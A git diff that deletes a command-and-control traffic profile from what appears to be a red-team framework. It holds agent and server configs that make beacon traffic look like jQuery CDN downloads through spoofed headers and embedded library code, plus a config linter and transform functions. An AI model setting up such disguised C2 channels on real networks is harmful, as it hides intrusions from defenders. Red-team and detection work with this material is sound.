this.mouseenter(e).mouseleave(t||e)}}),w.fn.extend({bind:function(e,t,n){return this.on(e,null,t,n)},unbind:function(e,t){return this.off(e,null,t)},delegate:function(e,t,n,r){return this.on(t,e,n,r)},undelegate:function(e,t,n){return 1===arguments.length?this.off(e,\"**\"):this.off(t,e||\"**\",n)}}),w.proxy=function(e,t){var n,r,i;if(\"string\"==typeof t&&(n=e[t],t=e,e=n),g(e))return r=o.call(arguments,2),i=function(){return e.apply(t||this,r.concat(o.call(arguments)))},i.guid=e.guid=e.guid||w.guid++,i},w.holdReady=function(e){e?w.readyWait++:w.ready(!0)},w.isArray=Array.isArray,w.parseJSON=JSON.parse,w.nodeName=N,w.isFunction=g,w.isWindow=y,w.camelCase=G,w.type=x,w.now=Date.now,w.isNumeric=function(e){var t=w.type(e);return(\"number\"===t||\"string\"===t)&&!isNaN(e-parseFloat(e))},\"function\"==typeof define&&define.amd&&define(\"jquery\",[],function(){return w});var Jt=e.jQuery,Kt=e.$;return w.noConflict=function(t){return e.$===w&&(e.$=Kt),t&&e.jQuery===w&&(e.jQuery=Jt),w},t||(e.jQuery=e.$=w),w});"] - } - ], - "ServerHeaders": { - "Server": "NetDNA-cache/2.2", - "Cache-Control": "max-age=0, no-cache", - "Pragma": "no-cache", - "Connection": "keep-alive", - "Content-Type": "application/javascript; charset=utf-8" - }, - "ServerCookies": {}, - "AgentMessage": [{ - "urls": ["http://192.168.205.151:9000"], - "uri": "/", - "urlFunctions": [ - { - "name": "", - "value": "", - "transforms": [ - { - "function": "choose_random", - "parameters": ["jquery-3.3.1.min.js","jquery-3.3.1.map"] - } - ] - } - ], - "AgentHeaders": { - "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", - "Host": "code.jquery.com", - "Referer": "http://code.jquery.com/", - "Accept-Encoding": "gzip, deflate", - "User-Agent": "Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko" - }, - "QueryParameters": [ - { - "name": "q", - "value": "message", - "transforms": [ - ] - } - ], - "Cookies": [ - { - "name": "__cfduid", - "value": "", - "transforms": [ - { - "function": "random_alpha", - "parameters": [30] - }, - { - "function": "base64", - "parameters": [] - } - ] - } - ], - "Body": [] - }] - }, - "POST": { - "ServerBody": [], - "ServerCookies": {}, - "ServerHeaders": { - "Server": "NetDNA-cache/2.2", - "Cache-Control": "max-age=0, no-cache", - "Pragma": "no-cache", - "Connection": "keep-alive", - "Content-Type": "application/javascript; charset=utf-8" - }, - "AgentMessage": [{ - "urls": ["http://192.168.205.151:9000"], - "uri": "/download.php", - "urlFunctions": [], - "QueryParameters": [ - { - "name": "bob2", - "value": "justforvalidation", - "transforms": [] - } - ], - "AgentHeaders": { - "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", - "Host": "code.jquery.com", - "Referer": "http://code.jquery.com/", - "Accept-Encoding": "gzip, deflate", - "User-Agent": "Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko" - }, - "Cookies": [ - { - "name": "BobCookie", - "value": "splat", - "transforms": [ - { - "function": "prepend", - "parameters": [ - "splatity_" - ] - } - ] - } - ], - "Body": [ - { - "function": "base64", - "parameters": [] - }, - { - "function": "prepend", - "parameters": [""] - }, - { - "function": "append", - "parameters": [""] - } - ] - }] - }, - "jitter": 50, - "interval": 10, - "chunk_size": 5120000, - "key_exchange": true, - "kill_date": "" -} diff --git a/C2_Profiles/dynamicHTTP/c2_code/config.json b/C2_Profiles/dynamicHTTP/c2_code/config.json deleted file mode 100755 index 689a34383..000000000 --- a/C2_Profiles/dynamicHTTP/c2_code/config.json +++ /dev/null @@ -1,160 +0,0 @@ -{ - "instances": [ - { - "GET": { - "ServerBody": [ - { - "function": "base64", - "parameters": [] - }, - { - "function": "prepend", - "parameters": ["!function(e,t){\"use strict\";\"object\"==typeof module&&\"object\"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error(\"jQuery requires a window with a document\");return t(e)}:t(e)}(\"undefined\"!=typeof window?window:this,function(e,t){\"use strict\";var n=[],r=e.document,i=Object.getPrototypeOf,o=n.slice,a=n.concat,s=n.push,u=n.indexOf,l={},c=l.toString,f=l.hasOwnProperty,p=f.toString,d=p.call(Object),h={},g=function e(t){return\"function\"==typeof t&&\"number\"!=typeof t.nodeType},y=function e(t){return null!=t&&t===t.window},v={type:!0,src:!0,noModule:!0};function m(e,t,n){var i,o=(t=t||r).createElement(\"script\");if(o.text=e,n)for(i in v)n[i]&&(o[i]=n[i]);t.head.appendChild(o).parentNode.removeChild(o)}function x(e){return null==e?e+\"\":\"object\"==typeof e||\"function\"==typeof e?l[c.call(e)]||\"object\":typeof e}var b=\"3.3.1\",w=function(e,t){return new w.fn.init(e,t)},T=/^[\\s\\uFEFF\\xA0]+|[\\s\\uFEFF\\xA0]+$/g;w.fn=w.prototype={jquery:\"3.3.1\",constructor:w,length:0,toArray:function(){return o.call(this)},get:function(e){return null==e?o.call(this):e<0?this[e+this.length]:this[e]},pushStack:function(e){var t=w.merge(this.constructor(),e);return t.prevObject=this,t},each:function(e){return w.each(this,e)},map:function(e){return this.pushStack(w.map(this,function(t,n){return e.call(t,n,t)}))},slice:function(){return this.pushStack(o.apply(this,arguments))},first:function(){return this.eq(0)},last:function(){return this.eq(-1)},eq:function(e){var t=this.length,n=+e+(e<0?t:0);return this.pushStack(n>=0&&n0&&t-1 in e)}var E=function(e){var t,n,r,i,o,a,s,u,l,c,f,p,d,h,g,y,v,m,x,b=\"sizzle\"+1*new Date,w=e.document,T=0,C=0,E=ae(),k=ae(),S=ae(),D=function(e,t){return e===t&&(f=!0),0},N={}.hasOwnProperty,A=[],j=A.pop,q=A.push,L=A.push,H=A.slice,O=function(e,t){for(var n=0,r=e.length;n0?this.on(t,null,e,n):this.trigger(t)}}),w.fn.extend({hover:function(e,t){return this.mouseenter(e).mouseleave(t||e)}}),w.fn.extend({bind:function(e,t,n){return this.on(e,null,t,n)},unbind:function(e,t){return this.off(e,null,t)},delegate:function(e,t,n,r){return this.on(t,e,n,r)},undelegate:function(e,t,n){return 1===arguments.length?this.off(e,\"**\"):this.off(t,e||\"**\",n)}}),w.proxy=function(e,t){var n,r,i;if(\"string\"==typeof t&&(n=e[t],t=e,e=n),g(e))return r=o.call(arguments,2),i=function(){return e.apply(t||this,r.concat(o.call(arguments)))},i.guid=e.guid=e.guid||w.guid++,i},w.holdReady=function(e){e?w.readyWait++:w.ready(!0)},w.isArray=Array.isArray,w.parseJSON=JSON.parse,w.nodeName=N,w.isFunction=g,w.isWindow=y,w.camelCase=G,w.type=x,w.now=Date.now,w.isNumeric=function(e){var t=w.type(e);return(\"number\"===t||\"string\"===t)&&!isNaN(e-parseFloat(e))},\"function\"==typeof define&&define.amd&&define(\"jquery\",[],function(){return w});var Jt=e.jQuery,Kt=e.$;return w.noConflict=function(t){return e.$===w&&(e.$=Kt),t&&e.jQuery===w&&(e.jQuery=Jt),w},t||(e.jQuery=e.$=w),w});"] - } - ], - "ServerHeaders": { - "Server": "NetDNA-cache/2.2", - "Cache-Control": "max-age=0, no-cache", - "Pragma": "no-cache", - "Connection": "keep-alive", - "Content-Type": "application/javascript; charset=utf-8" - }, - "ServerCookies": {}, - "AgentMessage": [{ - "urls": ["http://192.168.205.151:9000"], - "uri": "/", - "urlFunctions": [ - { - "name": "", - "value": "", - "transforms": [ - { - "function": "choose_random", - "parameters": ["jquery-3.3.1.min.js","jquery-3.3.1.map"] - } - ] - } - ], - "AgentHeaders": { - "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", - "Host": "code.jquery.com", - "Referer": "http://code.jquery.com/", - "Accept-Encoding": "gzip, deflate", - "User-Agent": "Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko" - }, - "QueryParameters": [ - { - "name": "q", - "value": "message", - "transforms": [ - ] - } - ], - "Cookies": [ - { - "name": "__cfduid", - "value": "", - "transforms": [ - { - "function": "random_alpha", - "parameters": [30] - }, - { - "function": "base64", - "parameters": [] - } - ] - } - ], - "Body": [] - }] - }, - "POST": { - "ServerBody": [], - "ServerCookies": {}, - "ServerHeaders": { - "Server": "NetDNA-cache/2.2", - "Cache-Control": "max-age=0, no-cache", - "Pragma": "no-cache", - "Connection": "keep-alive", - "Content-Type": "application/javascript; charset=utf-8" - }, - "AgentMessage": [{ - "urls": ["http://192.168.205.151:9000"], - "uri": "/download.php", - "urlFunctions": [], - "QueryParameters": [ - { - "name": "bob2", - "value": "justforvalidation", - "transforms": [] - } - ], - "AgentHeaders": { - "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", - "Host": "code.jquery.com", - "Referer": "http://code.jquery.com/", - "Accept-Encoding": "gzip, deflate", - "User-Agent": "Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko" - }, - "Cookies": [ - { - "name": "BobCookie", - "value": "splat", - "transforms": [ - { - "function": "prepend", - "parameters": [ - "splatity_" - ] - } - ] - } - ], - "Body": [ - { - "function": "base64", - "parameters": [] - }, - { - "function": "prepend", - "parameters": [""] - }, - { - "function": "append", - "parameters": [""] - } - ] - }] - }, - "no_match": { - "action": "return_file", - "redirect": "http://example.com", - "proxy_get": { - "url": "https://www.google.com", - "status": 200 - }, - "proxy_post": { - "url": "https://www.example.com", - "status": 200 - }, - "return_file": { - "name": "fake.html", - "status": 404 - } - }, - "port": 9000, - "key_path": "", - "cert_path": "", - "debug": false - } - ] -} diff --git a/C2_Profiles/dynamicHTTP/c2_code/config_linter.py b/C2_Profiles/dynamicHTTP/c2_code/config_linter.py deleted file mode 100755 index 7bde028a3..000000000 --- a/C2_Profiles/dynamicHTTP/c2_code/config_linter.py +++ /dev/null @@ -1,595 +0,0 @@ -#! /usr/bin/env python3 -import json -import sys -import os - - -class bcolors: - HEADER = "\033[95m" - OKBLUE = "\033[94m" - OKGREEN = "\033[92m" - WARNING = "\033[93m" - FAIL = "\033[91m" - ENDC = "\033[0m" - BOLD = "\033[1m" - UNDERLINE = "\033[4m" - - -def check_server_layout(server_config): - if "instances" not in server_config: - print( - f'{bcolors.FAIL}[-]{bcolors.ENDC} config.json must start with "instances"' - ) - - for inst in server_config["instances"]: - # loop through all the instances listed to see if the supplied config matches one of them - for method in ["GET", "POST"]: - if method not in inst: - print( - f'{bcolors.FAIL}[-]{bcolors.ENDC} Missing "{method}" element in instance' - ) - sys.exit(1) - if "ServerBody" not in inst[method]: - print( - f'{bcolors.FAIL}[-]{bcolors.ENDC} Missing "ServerBody" array in {method}' - ) - sys.exit(1) - for f in inst[method]["ServerBody"]: - if "function" not in f: - print( - f'{bcolors.FAIL}[-]{bcolors.ENDC} Missing "function" name in {method} ServerBody' - ) - sys.exit(1) - if "parameters" not in f: - print( - f'{bcolors.FAIL}[-]{bcolors.ENDC} Missing "parameters" array in {method} in ServerBody (can be an empty array indicated by []' - ) - sys.exit(1) - if "ServerHeaders" not in inst[method]: - print( - f'{bcolors.FAIL}[-]{bcolors.ENDC} Missing "ServerHeaders" dictionary' - ) - sys.exit(1) - if "ServerCookies" not in inst[method]: - print( - f'{bcolors.FAIL}[-]{bcolors.ENDC} Missing "ServerCookies" dictionary' - ) - sys.exit(1) - if "AgentMessage" not in inst[method]: - print(f'{bcolors.FAIL}[-]{bcolors.ENDC} Missing "AgentMessage" array') - sys.exit(1) - if len(inst[method]["AgentMessage"]) == 0: - print( - f'[*] "AgentMessage" array is empty, so you won\'t be able to do {method} messages' - ) - for m in inst[method]["AgentMessage"]: - if "urls" not in m: - print( - '[-] Missing "urls" array indicating urls where the agent will reach out to' - ) - sys.exit(1) - if "uri" not in m: - print( - '[-] Missing "uri" indicator of what the URI will be. If not in use, set to empty string' - ) - sys.exit(1) - if "urlFunctions" not in m: - print( - '[-] Missing "urlFunctions" array, if you don\'t intent to do any manipulations here, set to empty array []' - ) - sys.exit(1) - for f in m["urlFunctions"]: - if "name" not in f: - print('[-] Missing "name" parameter in urlFunction') - sys.exit(1) - if "value" not in f: - print( - '[-] Missing "value" parameter in urlFunction. This is the starting value before transforms are applied' - ) - sys.exit(1) - if "transforms" not in f: - print( - '[-] Missing "transforms" array. If no transforms needed, set to empty array []' - ) - sys.exit(1) - for t in f["transforms"]: - if "function" not in t: - print( - '[-] Missing "function" name in transforms in urlFunctions' - ) - sys.exit(1) - if "parameters" not in t: - print( - '[-] Missing "parameters" array in transforms in urlFunctions (can be an empty array indicated by []' - ) - sys.exit(1) - if "AgentHeaders" not in m: - print( - '[-] Missing "AgentHeaders" dictionary, this can be blank if the agent won\'t set any headers (i.e. {}' - ) - sys.exit(1) - if "QueryParameters" not in m: - print( - '[-] Missing "QueryParameters" array in GET. If no query parameters will be set, leave as empty array []' - ) - sys.exit(1) - for f in m["QueryParameters"]: - if "name" not in f: - print('[-] Missing "name" parameter in QueryParameters') - sys.exit(1) - if "value" not in f: - print( - '[-] Missing "value" parameter in QueryParameters. This is the starting value before transforms are applied' - ) - sys.exit(1) - if "transforms" not in f: - print( - '[-] Missing "transforms" array. If no transforms needed, set to empty array []' - ) - sys.exit(1) - for t in f["transforms"]: - if "function" not in t: - print( - '[-] Missing "function" name in transforms in QueryParameters' - ) - sys.exit(1) - if "parameters" not in t: - print( - '[-] Missing "parameters" array in transforms in QueryParameters (can be an empty array indicated by []' - ) - sys.exit(1) - if "Cookies" not in m: - print( - '[-] Missing "Cookies" array in GET. If none will be set, leave as empty array []' - ) - sys.exit(1) - for f in m["Cookies"]: - if "name" not in f: - print('[-] Missing "name" parameter in Cookies') - sys.exit(1) - if "value" not in f: - print( - '[-] Missing "value" parameter in Cookies. This is the starting value before transforms are applied' - ) - sys.exit(1) - if "transforms" not in f: - print( - '[-] Missing "transforms" array. If no transforms needed, set to empty array []' - ) - sys.exit(1) - for t in f["transforms"]: - if "function" not in t: - print( - '[-] Missing "function" name in transforms in Cookies' - ) - sys.exit(1) - if "parameters" not in t: - print( - '[-] Missing "parameters" array in transforms in Cookies (can be an empty array indicated by []' - ) - sys.exit(1) - if "Body" not in m: - print( - '[-] Missing "Body" array in GET message. If none will be supplied, set as empty array []' - ) - sys.exit(1) - if "no_match" not in inst: - print(f'{bcolors.FAIL}[-]{bcolors.ENDC} Missing "no_match" dictionary') - sys.exit(1) - if "action" not in inst["no_match"]: - print(f'{bcolors.FAIL}[-]{bcolors.ENDC} Missing "action" key in "no_match"') - sys.exit(1) - if inst["no_match"]["action"] not in [ - "redirect", - "proxy_get", - "proxy_post", - "return_file", - ]: - print( - f"{bcolors.FAIL}[-]{bcolors.ENDC} no_match action isn't in the approved list" - ) - sys.exit(1) - if "redirect" not in inst["no_match"]: - print( - f'{bcolors.FAIL}[-]{bcolors.ENDC} Missing "redirect" option in no_match' - ) - sys.exit(1) - if "proxy_get" not in inst["no_match"]: - print( - f'{bcolors.FAIL}[-]{bcolors.ENDC} Missing "proxy_get" option in no_match' - ) - sys.exit(1) - if "url" not in inst["no_match"]["proxy_get"]: - print( - f'{bcolors.FAIL}[-]{bcolors.ENDC} Missing "url" in no_match\'s proxy_get dictionary' - ) - sys.exit(1) - if "status" not in inst["no_match"]["proxy_get"]: - print( - f'{bcolors.FAIL}[-]{bcolors.ENDC} Missing "status" code for no_match\'s proxy_get dictionary' - ) - sys.exit(1) - if "proxy_post" not in inst["no_match"]: - print( - f'{bcolors.FAIL}[-]{bcolors.ENDC} Missing "proxy_post" option in no_match' - ) - sys.exit(1) - if "url" not in inst["no_match"]["proxy_post"]: - print( - f'{bcolors.FAIL}[-]{bcolors.ENDC} Missing "url" in no_match\'s proxy_post dictionary' - ) - sys.exit(1) - if "status" not in inst["no_match"]["proxy_post"]: - print( - f'{bcolors.FAIL}[-]{bcolors.ENDC} Missing "status" code in no_match\'s proxy_post dictionary' - ) - sys.exit(1) - if "return_file" not in inst["no_match"]: - print(f'{bcolors.FAIL}[-]{bcolors.ENDC} Missing "return_file" in no_match') - sys.exit(1) - if "name" not in inst["no_match"]["return_file"]: - print( - f'{bcolors.FAIL}[-]{bcolors.ENDC} Missing "name" for the file to be returned in no_match case' - ) - sys.exit(1) - if not os.path.exists(inst["no_match"]["return_file"]["name"]): - print( - f'{bcolors.FAIL}[-]{bcolors.ENDC} File specified in "no_match" case for "return_file" can\'t be found' - ) - sys.exit(1) - if "status" not in inst["no_match"]["return_file"]: - print( - f'{bcolors.FAIL}[-]{bcolors.ENDC} Misisng "status" return code for no_match\'s return_file' - ) - sys.exit(1) - if "port" not in inst: - print(f'{bcolors.FAIL}[-]{bcolors.ENDC} Missing "port" in instance') - sys.exit(1) - if "key_path" not in inst: - print(f'{bcolors.FAIL}[-]{bcolors.ENDC} Missing "key_path" in instance') - sys.exit(1) - if inst["key_path"] != "" and not os.path.exists(inst["key_path"]): - print(f"{bcolors.FAIL}[-]{bcolors.ENDC} Key_path file can't be found") - sys.exit(1) - if "cert_path" not in inst: - print(f'{bcolors.FAIL}[-]{bcolors.ENDC} Missing "cert_path" in instance') - sys.exit(1) - if inst["cert_path"] != "" and not os.path.exists(inst["cert_path"]): - print(f"{bcolors.FAIL}[-]{bcolors.ENDC} cert_path file can't be found") - sys.exit(1) - if "debug" not in inst: - print( - f'{bcolors.FAIL}[-]{bcolors.ENDC} Missing "debug" boolean in instance' - ) - sys.exit(1) - - -def check_agent_config_layout(inst): - for method in ["GET", "POST"]: - if method not in inst: - print( - f'{bcolors.FAIL}[-]{bcolors.ENDC} Missing "{method}" element in instance' - ) - sys.exit(1) - if "ServerBody" not in inst[method]: - print( - f'{bcolors.FAIL}[-]{bcolors.ENDC} Missing "ServerBody" array in {method}' - ) - sys.exit(1) - for f in inst[method]["ServerBody"]: - if "function" not in f: - print( - f'{bcolors.FAIL}[-]{bcolors.ENDC} Missing "function" name in {method} ServerBody' - ) - sys.exit(1) - if "parameters" not in f: - print( - f'{bcolors.FAIL}[-]{bcolors.ENDC} Missing "parameters" array in {method} in ServerBody (can be an empty array indicated by []' - ) - sys.exit(1) - if "ServerHeaders" not in inst[method]: - print(f'{bcolors.FAIL}[-]{bcolors.ENDC} Missing "ServerHeaders" dictionary') - sys.exit(1) - if "ServerCookies" not in inst[method]: - print(f'{bcolors.FAIL}[-]{bcolors.ENDC} Missing "ServerCookies" dictionary') - sys.exit(1) - if "AgentMessage" not in inst[method]: - print(f'{bcolors.FAIL}[-]{bcolors.ENDC} Missing "AgentMessage" array') - sys.exit(1) - if len(inst[method]["AgentMessage"]) == 0: - print( - f'[*] "AgentMessage" array is empty, so you won\'t be able to do {method} messages' - ) - for m in inst[method]["AgentMessage"]: - if "urls" not in m: - print( - f'{bcolors.FAIL}[-]{bcolors.ENDC} Missing "urls" array indicating urls where the agent will reach out to' - ) - sys.exit(1) - if "uri" not in m: - print( - f'{bcolors.FAIL}[-]{bcolors.ENDC} Missing "uri" indicator of what the URI will be. If not in use, set to empty string' - ) - sys.exit(1) - if "urlFunctions" not in m: - print( - f'{bcolors.FAIL}[-]{bcolors.ENDC} Missing "urlFunctions" array, if you don\'t intent to do any manipulations here, set to empty array []' - ) - sys.exit(1) - for f in m["urlFunctions"]: - if "name" not in f: - print( - f'{bcolors.FAIL}[-]{bcolors.ENDC} Missing "name" parameter in urlFunction' - ) - sys.exit(1) - if "value" not in f: - print( - f'{bcolors.FAIL}[-]{bcolors.ENDC} Missing "value" parameter in urlFunction. This is the starting value before transforms are applied' - ) - sys.exit(1) - if "transforms" not in f: - print( - f'{bcolors.FAIL}[-]{bcolors.ENDC} Missing "transforms" array. If no transforms needed, set to empty array []' - ) - sys.exit(1) - for t in f["transforms"]: - if "function" not in t: - print( - f'{bcolors.FAIL}[-]{bcolors.ENDC} Missing "function" name in transforms in urlFunctions' - ) - sys.exit(1) - if "parameters" not in t: - print( - f'{bcolors.FAIL}[-]{bcolors.ENDC} Missing "parameters" array in transforms in urlFunctions (can be an empty array indicated by []' - ) - sys.exit(1) - if "AgentHeaders" not in m: - print( - f'{bcolors.FAIL}[-]{bcolors.ENDC} Missing "AgentHeaders" dictionary, this can be blank if the agent won\'t set any headers' - ) - sys.exit(1) - if "QueryParameters" not in m: - print( - f'{bcolors.FAIL}[-]{bcolors.ENDC} Missing "QueryParameters" array in GET. If no query parameters will be set, leave as empty array []' - ) - sys.exit(1) - for f in m["QueryParameters"]: - if "name" not in f: - print( - f'{bcolors.FAIL}[-]{bcolors.ENDC} Missing "name" parameter in QueryParameters' - ) - sys.exit(1) - if "value" not in f: - print( - '[-] Missing "value" parameter in QueryParameters. This is the starting value before transforms are applied' - ) - sys.exit(1) - if "transforms" not in f: - print( - f'{bcolors.FAIL}[-]{bcolors.ENDC} Missing "transforms" array. If no transforms needed, set to empty array []' - ) - sys.exit(1) - for t in f["transforms"]: - if "function" not in t: - print( - f'{bcolors.FAIL}[-]{bcolors.ENDC} Missing "function" name in transforms in QueryParameters' - ) - sys.exit(1) - if "parameters" not in t: - print( - f'{bcolors.FAIL}[-]{bcolors.ENDC} Missing "parameters" array in transforms in QueryParameters (can be an empty array indicated by []' - ) - sys.exit(1) - if "Cookies" not in m: - print( - f'{bcolors.FAIL}[-]{bcolors.ENDC} Missing "Cookies" array in GET. If none will be set, leave as empty array []' - ) - sys.exit(1) - for f in m["Cookies"]: - if "name" not in f: - print( - f'{bcolors.FAIL}[-]{bcolors.ENDC} Missing "name" parameter in Cookies' - ) - sys.exit(1) - if "value" not in f: - print( - f'{bcolors.FAIL}[-]{bcolors.ENDC} Missing "value" parameter in Cookies. This is the starting value before transforms are applied' - ) - sys.exit(1) - if "transforms" not in f: - print( - f'{bcolors.FAIL}[-]{bcolors.ENDC} Missing "transforms" array. If no transforms needed, set to empty array []' - ) - sys.exit(1) - for t in f["transforms"]: - if "function" not in t: - print( - f'{bcolors.FAIL}[-]{bcolors.ENDC} Missing "function" name in transforms in Cookies' - ) - sys.exit(1) - if "parameters" not in t: - print( - f'{bcolors.FAIL}[-]{bcolors.ENDC} Missing "parameters" array in transforms in Cookies (can be an empty array indicated by []' - ) - sys.exit(1) - if "Body" not in m: - print( - f'{bcolors.FAIL}[-]{bcolors.ENDC} Missing "Body" array in GET message. If none will be supplied, set as empty array []' - ) - sys.exit(1) - if "jitter" not in inst: - print(f'{bcolors.FAIL}[-]{bcolors.ENDC} Missing "jitter"') - sys.exit(1) - if "interval" not in inst: - print(f'{bcolors.FAIL}[-]{bcolors.ENDC} Missing "interval"') - sys.exit(1) - if "chunk_size" not in inst: - print(f'{bcolors.FAIL}[-]{bcolors.ENDC} Missing "chunk_size"') - sys.exit(1) - if "key_exchange" not in inst: - print(f'{bcolors.FAIL}[-]{bcolors.ENDC} Missing "key_exchange" boolean') - sys.exit(1) - if "kill_date" not in inst: - print(f'{bcolors.FAIL}[-]{bcolors.ENDC} Missing "kill_date"') - sys.exit(1) - - -def check_config(server_config, agent_config, method): - # get info for agent config - agent_message = {"location": "", "value": "", "method": method} - print(f"{bcolors.OKBLUE}[*]{bcolors.ENDC} Looking into {method} AgentMessages") - for g in agent_config[method]["AgentMessage"]: - # we need to find where the "message" parameter exists so we know where the data will be - agent_message["urls"] = g["urls"] - agent_message["uri"] = g["uri"] - print( - f"{bcolors.OKBLUE}[*]{bcolors.ENDC} Current URLs: {g['urls']}\n\tCurrent URI: {g['uri']}" - ) - for p in g["QueryParameters"]: - if p["value"] == "message": - print( - f"{bcolors.OKBLUE}[*]{bcolors.ENDC} Found 'message' keyword in QueryParameter {p['name']}" - ) - agent_message["location"] = "QueryParameters" - agent_message["value"] = p - for p in g["Cookies"]: - if p["value"] == "message": - print( - f"{bcolors.OKBLUE}[*]{bcolors.ENDC} Found 'message' keyword in Cookies {p['name']}" - ) - agent_message["location"] = "Cookies" - agent_message["value"] = p - for p in g["urlFunctions"]: - if p["name"] == "": - print( - f"{bcolors.OKBLUE}[*]{bcolors.ENDC} Found '' keyword in urlFunctions" - ) - agent_message["location"] = "URI" - agent_message["value"] = p - if agent_message["location"] == "": - # if we haven't set it yet, data must be in the body - print( - f"{bcolors.OKBLUE}[*]{bcolors.ENDC} Didn't find message keyword anywhere, assuming it to be the Body of the message" - ) - agent_message["location"] = "Body" - agent_message["value"] = g["Body"] - print( - f"{bcolors.OKBLUE}[*]{bcolors.ENDC} Now checking server config for matching section" - ) - check_match_to_server(server_config, agent_message) - - -def check_match_to_server(server_config, agent_message): - for inst in server_config["instances"]: - # only look into AgentMessage details if the urls and uri match - for g in inst[agent_message["method"]]["AgentMessage"]: - match = False - if agent_message["uri"] != g["uri"]: - continue - if not urls_match(agent_message["urls"], g["urls"]): - continue - else: - print( - f"{bcolors.OKBLUE}[*]{bcolors.ENDC} Found matching URLs and URI, checking rest of AgentMessage" - ) - if agent_message["location"] == "Body": - print( - f"{bcolors.OKBLUE}[*]{bcolors.ENDC} Checking for matching Body messages" - ) - match = body_match(g["Body"], agent_message["value"]) - else: - match = contains_element( - agent_message["value"], g[agent_message["location"]] - ) - if match: - print(f"{bcolors.OKGREEN}[+]{bcolors.ENDC} FOUND MATCH") - return True - else: - print( - f"{bcolors.FAIL}[-]{bcolors.ENDC} Matched URLs/URI failed to match AgentMessages" - ) - return False - print(f"{bcolors.FAIL}[-]{bcolors.ENDC} Failed to find any matching URLs/URIs") - return False - - -def transforms_match(arr1, arr2): - if len(arr1) != len(arr2): - return False - for i in range(len(arr1)): - if arr1[i]["function"] != arr2[i]["function"]: - return False - if len(arr1[i]["parameters"]) != len(arr2[i]["parameters"]): - return False - for j in range(len(arr1[i]["parameters"])): - if arr1[i]["parameters"][j] != arr2[i]["parameters"][j]: - return False - return True - - -def body_match(arr1, arr2): - if len(arr1) != len(arr2): - return False - for e in range(len(arr1)): - if arr1[e]["function"] != arr2[e]["function"]: - return False - if len(arr1[e]["parameters"]) != len(arr2[e]["parameters"]): - return False - for p in range(len(arr1[e]["parameters"])): - if arr1[e]["parameters"][p] != arr2[e]["parameters"][p]: - return False - return True - - -def contains_element(ele, arr): - # check if arr contains ele - for i in arr: - if i["name"] == ele["name"]: - if i["value"] == ele["value"]: - if transforms_match(ele["transforms"], i["transforms"]): - return True - return False - - -def urls_match(arr1, arr2): - if len(arr1) != len(arr2): - return False - for i in range(len(arr1)): - if arr1[i] not in arr2: - return False - return True - - -if __name__ == "__main__": - if os.path.exists("config.json"): - server_config = json.load(open("config.json")) - else: - print(f"{bcolors.FAIL}[-]{bcolors.ENDC} Can't find config.json") - sys.exit(1) - - if len(sys.argv) < 2: - print( - f"{bcolors.FAIL}[-]{bcolors.ENDC} Please specify an agent config file on the command line" - ) - sys.exit(1) - - if os.path.exists(sys.argv[1]): - agent_config = json.load(open(sys.argv[1])) - else: - print(f"{bcolors.FAIL}[-]{bcolors.ENDC} Can't find the supplied file") - sys.exit(1) - # first, check that the two configs have all the right pieces - print( - f"{bcolors.OKBLUE}[*]{bcolors.ENDC} Checking server config for layout structure" - ) - check_server_layout(server_config) - print(f"{bcolors.OKGREEN}[+]{bcolors.ENDC} Server config layout structure is good") - print( - f"{bcolors.OKBLUE}[*]{bcolors.ENDC} Checking agent config for layout structure" - ) - check_agent_config_layout(agent_config) - print(f"{bcolors.OKGREEN}[+]{bcolors.ENDC} Agent config layout structure is good") - # now check that server_config can understand an agent_config message - # first check a GET request - check_config(server_config, agent_config, "GET") - check_config(server_config, agent_config, "POST") diff --git a/C2_Profiles/dynamicHTTP/c2_code/fake.html b/C2_Profiles/dynamicHTTP/c2_code/fake.html deleted file mode 100755 index 3968cb8fc..000000000 --- a/C2_Profiles/dynamicHTTP/c2_code/fake.html +++ /dev/null @@ -1,10 +0,0 @@ - - - - - Page Not Found! - - - - - \ No newline at end of file diff --git a/C2_Profiles/dynamicHTTP/c2_code/server b/C2_Profiles/dynamicHTTP/c2_code/server deleted file mode 100755 index 61a85ed78..000000000 --- a/C2_Profiles/dynamicHTTP/c2_code/server +++ /dev/null @@ -1,353 +0,0 @@ -#!/usr/bin/env python3 - -from sanic import Sanic -from sanic.response import html, redirect, raw -from sanic.exceptions import NotFound -import sys -import asyncio -import ssl -from pathlib import Path -import json -import requests -import base64 as b64 -import random -import os - -config = {} - - -async def r_base64(*args): - # called with base64(value) - if isinstance(args[0], str): - return b64.b64decode(args[0].encode()) - else: - return b64.b64decode(args[0]) - - -async def base64(*args): - # called with base64(value) - return b64.b64encode(args[0]).decode('utf-8') - - -async def r_prepend(*args): - # called with prepend(value, "string") - return args[0][len(args[1]):] - - -async def prepend(*args): - # called with prepend(value, "string") - return str(args[1]) + str(args[0]) - - -async def r_append(*args): - # called with append(value, "string") - return args[0][:len(args[0]) - len(args[1])] - - -async def append(*args): - # called with append(value, "string") - return args[0] + args[1] - - -async def random_mixed(*args): - # called with random_mixed(value, 10), always appends - letters = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789" - rnd = ''.join(random.choice(letters) for i in range(args[1])) - return args[0] + rnd - - -async def r_random_mixed(*args): - # called with random_mixed(value, 10), always appends - # return the string going from 0 to -10 (or ten from the end) - return args[0][: -1 * args[1]] - - -async def random_number(*args): - # called with random_number(value, 10) - letters = "0987654321" - rnd = ''.join(random.choice(letters) for i in range(args[1])) - return args[0] + rnd - - -async def r_random_number(*args): - # called with random_mixed(value, 10), always appends - # return the string going from 0 to -10 (or ten from the end) - return args[0][: -1 * args[1]] - - -async def random_alpha(*args): - # called with random_alpha(value, 10), always appends - letters = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz" - rnd = ''.join(random.choice(letters) for i in range(args[1])) - return args[0] + rnd - - -async def r_random_alpha(*args): - # called with random_mixed(value, 10), always appends - # return the string going from 0 to -10 (or ten from the end) - return args[0][: -1 * args[1]] - - 